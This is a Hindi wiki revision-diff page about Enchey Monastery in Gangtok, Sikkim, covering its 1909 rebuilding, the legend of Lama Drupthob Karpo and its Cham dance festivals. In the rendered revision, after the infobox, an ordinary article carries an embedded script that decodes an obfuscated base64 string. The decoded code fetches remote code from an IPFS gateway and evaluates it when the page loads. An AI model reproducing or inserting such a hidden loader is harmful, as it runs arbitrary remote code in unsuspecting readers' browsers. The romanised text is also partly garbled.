Difference between revisions of "इंचे मठ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
 
{{सूचना बक्सा पर्यटन
 
{{सूचना बक्सा पर्यटन
 
|चित्र=Enchey-Monastery-1.jpg   
 
|चित्र=Enchey-Monastery-1.jpg   
|चित्र का नाम=इंचे मठ गंगटोक
+
|चित्र का नाम=इंचे मठ, गंगटोक
|विवरण=इंचे मठ [[सिक्किम]] की राजधानी [[गंगटोक]] में स्थित है। गंगटोक में एंचेय मठ पूजा का बहुत ही पवित्र और सुंदर स्‍थान है।
+
|विवरण='इंचे मठ' अथवा 'एंचेय मठ' [[सिक्किम]] की राजधानी [[गंगटोक]] में स्थित है। गंगटोक में यह मठ [[पूजा]] का बहुत ही पवित्र और सुंदर स्‍थान है।
 
|राज्य=[[सिक्किम]]
 
|राज्य=[[सिक्किम]]
 
|केन्द्र शासित प्रदेश=
 
|केन्द्र शासित प्रदेश=
Line 10: Line 10:
 
|प्रबंधक=
 
|प्रबंधक=
 
|निर्माण काल=
 
|निर्माण काल=
|स्थापना=1909
+
|स्थापना=[[1909]] ई.
 
|भौगोलिक स्थिति=  
 
|भौगोलिक स्थिति=  
 
|मार्ग स्थिति=
 
|मार्ग स्थिति=
 
|मौसम=
 
|मौसम=
 
|तापमान=
 
|तापमान=
|प्रसिद्धि=[[नृत्य कला|नृत्य]] के लिये प्रसिद्ध है। इस नृत्‍य को चाम कहा जाता है।
+
|प्रसिद्धि=[[नृत्य कला|नृत्य]] के लिये प्रसिद्ध है। इस नृत्‍य को 'चाम' कहा जाता है।
 
|कब जाएँ=
 
|कब जाएँ=
 
|कैसे पहुँचें=
 
|कैसे पहुँचें=
Line 39: Line 39:
 
|अद्यतन={{अद्यतन|13:39, 29 सितम्बर 2016 (IST)}}
 
|अद्यतन={{अद्यतन|13:39, 29 सितम्बर 2016 (IST)}}
 
}}
 
}}
 
+
'''इंचे मठ''' अथवा 'एंचेय मठ' [[सिक्किम]] की राजधानी [[गंगटोक]] में स्थित है। गंगटोक में एंचेय मठ [[पूजा]] का बहुत ही पवित्र और सुंदर स्‍थान है। इनहेंची का शाब्दिक अर्थ निर्जन होता है।  
'''इंचे मठ''' [[सिक्किम]] की राजधानी [[गंगटोक]] में स्थित है। गंगटोक में एंचेय मठ पूजा का बहुत ही पवित्र और सुंदर स्‍थान है। इनहेंची का शाब्दिक अर्थ निर्जन होता है।  
 
 
 
 
==स्थापना==
 
==स्थापना==
मूल रुप से इस मठ की स्‍थापना 200 [[वर्ष]] पहले हुई थी। बाद में इंचे मठ का पुननिर्माण 1909 ई. में किया गया था। गंगटोक के ऊपर सुंदर पहाड़ी पर इसका निर्माण किया गया है जहां से माउंट कंचनजंगा के शानदार दृश्य  का आनंद ले सकते हैं।
+
मूल रूप से इस मठ की स्‍थापना 200 [[वर्ष]] पहले हुई थी। बाद में मठ का पुननिर्माण [[1909]] ई. में किया गया था। गंगटोक के ऊपर सुंदर पहाड़ी पर इसका निर्माण किया गया है जहां से [[कंचनजंगा|माउंट कंचनजंगा]] के शानदार दृश्य  का आनंद ले सकते हैं।
 
==कथा==
 
==कथा==
एक पौराणिक कथा के अनुसार यह मठ बौद्ध धर्म के वज्रयना न्यिन्गमा समाज के अंतर्गत आता है, यह एक ऐसे स्थान में मौजूद है, जिस पर लामा द्रुपथेब करपो का आशीर्वाद बरसता है।
+
एक पौराणिक कथा के अनुसार यह मठ [[बौद्ध धर्म]] के वज्रयना न्यिन्गमा समाज के अंतर्गत आता है, यह एक ऐसे स्थान में मौजूद है, जिस पर लामा द्रुपथेब करपो का आशीर्वाद बरसता है।
द्रुपथेब उड़ान शक्तियों के साथ बौद्ध धर्म की तांत्रिक कला में विशेषज्ञ थे और वे दक्षिण सिक्किम में मेनम हिल से उड़कर यहां आये और इस स्‍थान पर एक छोटे से मठ की स्थापना की। यह मठ द्रुपटोब कारपो को समर्पित है। कारपो को जादुई शक्ति के लिए याद किया जाता है। जिस समय इंचे मठ का निर्माण हो रहा था। उस समय इस पूरे क्षेत्र में सिर्फ यही एक भवन था। इसका नाम 'एंचेय मठ' का मतलब है एकान्त मठ और इसके अतिरिक्त एक और कथन है, कि यह जगह हमारी रक्षा करने वाले देवताओं - कांगचेन्‍डजोंगा और याबडियान की उपस्थिति के लिए पवित्र है।<ref name="enchey">{{cite web |url=http://hindi.nativeplanet.com/gangtok/attractions/enchey-monastery/|title= एंचेय मठ, गंगटोक|accessmonthday= 29 सितम्बर|accessyear= 2016|last= |first= |authorlink= |format= |publisher=ने‍टिव प्‍लानेट|language=हिन्दी}}</ref>
+
द्रुपथेब उड़ान शक्तियों के साथ बौद्ध धर्म की तांत्रिक कला में विशेषज्ञ थे और वे दक्षिण सिक्किम में मेनम हिल से उड़कर यहां आये और इस स्‍थान पर एक छोटे से मठ की स्थापना की। यह मठ द्रुपटोब कारपो को समर्पित है।
 
 
  
 +
कारपो को जादुई शक्ति के लिए याद किया जाता है। जिस समय इंचे मठ का निर्माण हो रहा था। उस समय इस पूरे क्षेत्र में सिर्फ यही एक भवन था। इसका नाम 'एंचेय मठ' का मतलब है एकान्त मठ और इसके अतिरिक्त एक और कथन है, कि यह जगह हमारी रक्षा करने वाले देवताओं - कांगचेन्‍डजोंगा और याबडियान की उपस्थिति के लिए पवित्र है।<ref name="enchey">{{cite web |url=http://hindi.nativeplanet.com/gangtok/attractions/enchey-monastery/|title= एंचेय मठ, गंगटोक|accessmonthday= 29 सितम्बर|accessyear= 2016|last= |first= |authorlink= |format= |publisher=ने‍टिव प्‍लानेट|language=हिन्दी}}</ref>
 
==मुख्‍य आकर्षण==
 
==मुख्‍य आकर्षण==
 
इस मठ का मुख्‍य आकर्षण [[जनवरी]] के महीने में यहाँ होने वाला विशेष [[नृत्य कला|नृत्य]] है। इस नृत्‍य को चाम कहा जाता है। गंगटोक के लोगों और अन्य भक्तों के दिलों में एक खास जगह बनाती हैं, जो मानते हैं कि गोम्पा के भीतर शक्तिशाली देवता हैं और वे सभी की इच्छाओं को पूरा करेंगे। गोम्पा का निर्माण बहुत ही आलंकारिक तरीके से किया गया है और अंदर देवताओं के कई आकर्षक चित्र हैं। लोकी शरिया, बुद्ध और गुरु पद्मसंभव मुख्य देवी-देवता हैं, जिनकी यहां पूजा होती है।<ref name="enchey">{{cite web |url=http://hindi.nativeplanet.com/gangtok/attractions/enchey-monastery/|title= एंचेय मठ, गंगटोक|accessmonthday= 29 सितम्बर|accessyear= 2016|last= |first= |authorlink= |format= |publisher=ने‍टिव प्‍लानेट|language=हिन्दी}}</ref>
 
इस मठ का मुख्‍य आकर्षण [[जनवरी]] के महीने में यहाँ होने वाला विशेष [[नृत्य कला|नृत्य]] है। इस नृत्‍य को चाम कहा जाता है। गंगटोक के लोगों और अन्य भक्तों के दिलों में एक खास जगह बनाती हैं, जो मानते हैं कि गोम्पा के भीतर शक्तिशाली देवता हैं और वे सभी की इच्छाओं को पूरा करेंगे। गोम्पा का निर्माण बहुत ही आलंकारिक तरीके से किया गया है और अंदर देवताओं के कई आकर्षक चित्र हैं। लोकी शरिया, बुद्ध और गुरु पद्मसंभव मुख्य देवी-देवता हैं, जिनकी यहां पूजा होती है।<ref name="enchey">{{cite web |url=http://hindi.nativeplanet.com/gangtok/attractions/enchey-monastery/|title= एंचेय मठ, गंगटोक|accessmonthday= 29 सितम्बर|accessyear= 2016|last= |first= |authorlink= |format= |publisher=ने‍टिव प्‍लानेट|language=हिन्दी}}</ref>
Line 54: Line 52:
 
गोम्पा में वार्षिक धार्मिक नृत्य के  लिए इस्तेमाल किये जाने वाले मास्क की एक सारणी और एक पुस्तकालय भी है। दुर्भाग्य से, सिक्किम में 2006 में आए भूकंप के दौरान मठ को गंभीर नुकसान का सामना करना पड़ा। मठ हर साल कुछ महत्वपूर्ण त्यौहार मनाता है। उनमें से कुछ हैं: डेटोर चाम/ चाम नृत्य महोत्सव, सिंघे चाम और पंग लभसोल आदि है।
 
गोम्पा में वार्षिक धार्मिक नृत्य के  लिए इस्तेमाल किये जाने वाले मास्क की एक सारणी और एक पुस्तकालय भी है। दुर्भाग्य से, सिक्किम में 2006 में आए भूकंप के दौरान मठ को गंभीर नुकसान का सामना करना पड़ा। मठ हर साल कुछ महत्वपूर्ण त्यौहार मनाता है। उनमें से कुछ हैं: डेटोर चाम/ चाम नृत्य महोत्सव, सिंघे चाम और पंग लभसोल आदि है।
 
[[चित्र:Enchey-Monastery.jpg|thumb|250px|left|इंचे मठ, [[गंगटोक]]]]<ref name="enchey">{{cite web |url=http://hindi.nativeplanet.com/gangtok/attractions/enchey-monastery/|title= एंचेय मठ, गंगटोक|accessmonthday= 29 सितम्बर|accessyear= 2016|last= |first= |authorlink= |format= |publisher=ने‍टिव प्‍लानेट|language=हिन्दी}}</ref>
 
[[चित्र:Enchey-Monastery.jpg|thumb|250px|left|इंचे मठ, [[गंगटोक]]]]<ref name="enchey">{{cite web |url=http://hindi.nativeplanet.com/gangtok/attractions/enchey-monastery/|title= एंचेय मठ, गंगटोक|accessmonthday= 29 सितम्बर|accessyear= 2016|last= |first= |authorlink= |format= |publisher=ने‍टिव प्‍लानेट|language=हिन्दी}}</ref>
 
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{सिक्किम के पर्यटन स्थल}}
 
{{सिक्किम के पर्यटन स्थल}}
[[Category:सिक्किम]]
+
[[Category:सिक्किम]][[Category:सिक्किम के पर्यटन स्थल]][[Category:पर्यटन कोश]][[Category:बौद्ध धर्म]][[Category:बौद्ध धर्म कोश]][[Category:इतिहास कोश]]
[[Category:सिक्किम के पर्यटन स्थल]]  
 
[[Category:पर्यटन कोश]]
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 11:23, 8 September 2018

ianche math
vivaran 'ianche math' athava 'eanchey math' sikkim ki rajadhani gangatok mean sthit hai. gangatok mean yah math pooja ka bahut hi pavitr aur suandar sh‍than hai.
rajy sikkim
zila gangatok
sthapana 1909 ee.
prasiddhi nrity ke liye prasiddh hai. is nrith‍y ko 'cham' kaha jata hai.
yatayat riksha, taiksi, siti bas
kahaan thaharean hotal, dharmashala, atithi grah
chitr:Map-icon.gif googal manachitr
sanbandhit lekh yumathaang ghati, rumatek math, somago jhil


any janakari yah math drupatob karapo ko samarpit hai. karapo ko jaduee shakti ke lie yad kiya jata hai. jis samay ianche math ka nirman ho raha tha. us samay is poore kshetr mean sirph yahi ek bhavan tha. isaka nam 'eanchey math' ka matalab hai ekant math.
adyatan‎

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ianche math athava 'eanchey math' sikkim ki rajadhani gangatok mean sthit hai. gangatok mean eanchey math pooja ka bahut hi pavitr aur suandar sh‍than hai. inaheanchi ka shabdik arth nirjan hota hai.

sthapana

mool roop se is math ki sh‍thapana 200 varsh pahale huee thi. bad mean math ka punanirman 1909 ee. mean kiya gaya tha. gangatok ke oopar suandar paha di par isaka nirman kiya gaya hai jahaan se mauant kanchanajanga ke shanadar drishy ka anand le sakate haian.

katha

ek pauranik katha ke anusar yah math bauddh dharm ke vajrayana nyingama samaj ke aantargat ata hai, yah ek aise sthan mean maujood hai, jis par lama drupatheb karapo ka ashirvad barasata hai. drupatheb u dan shaktiyoan ke sath bauddh dharm ki taantrik kala mean visheshajn the aur ve dakshin sikkim mean menam hil se u dakar yahaan aye aur is sh‍than par ek chhote se math ki sthapana ki. yah math drupatob karapo ko samarpit hai.

karapo ko jaduee shakti ke lie yad kiya jata hai. jis samay ianche math ka nirman ho raha tha. us samay is poore kshetr mean sirph yahi ek bhavan tha. isaka nam 'eanchey math' ka matalab hai ekant math aur isake atirikt ek aur kathan hai, ki yah jagah hamari raksha karane vale devataoan - kaangachenh‍dajoanga aur yabadiyan ki upasthiti ke lie pavitr hai.[1]

mukhh‍y akarshan

is math ka mukhh‍y akarshan janavari ke mahine mean yahaan hone vala vishesh nrity hai. is nrith‍y ko cham kaha jata hai. gangatok ke logoan aur any bhaktoan ke diloan mean ek khas jagah banati haian, jo manate haian ki gompa ke bhitar shaktishali devata haian aur ve sabhi ki ichchhaoan ko poora kareange. gompa ka nirman bahut hi alankarik tarike se kiya gaya hai aur aandar devataoan ke kee akarshak chitr haian. loki shariya, buddh aur guru padmasanbhav mukhy devi-devata haian, jinaki yahaan pooja hoti hai.[1]

gompa mean varshik dharmik nrity ke lie istemal kiye jane vale mask ki ek sarani aur ek pustakalay bhi hai. durbhagy se, sikkim mean 2006 mean ae bhookanp ke dauran math ko ganbhir nukasan ka samana karana p da. math har sal kuchh mahatvapoorn tyauhar manata hai. unamean se kuchh haian: detor cham/ cham nrity mahotsav, sianghe cham aur pang labhasol adi hai. [[chitr:Enchey-Monastery.jpg|thumb|250px|left|ianche math, gangatok]][1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 eanchey math, gangatok (hindi) ne‍tiv ph‍lanet. abhigaman tithi: 29 sitambar, 2016.

sanbandhit lekh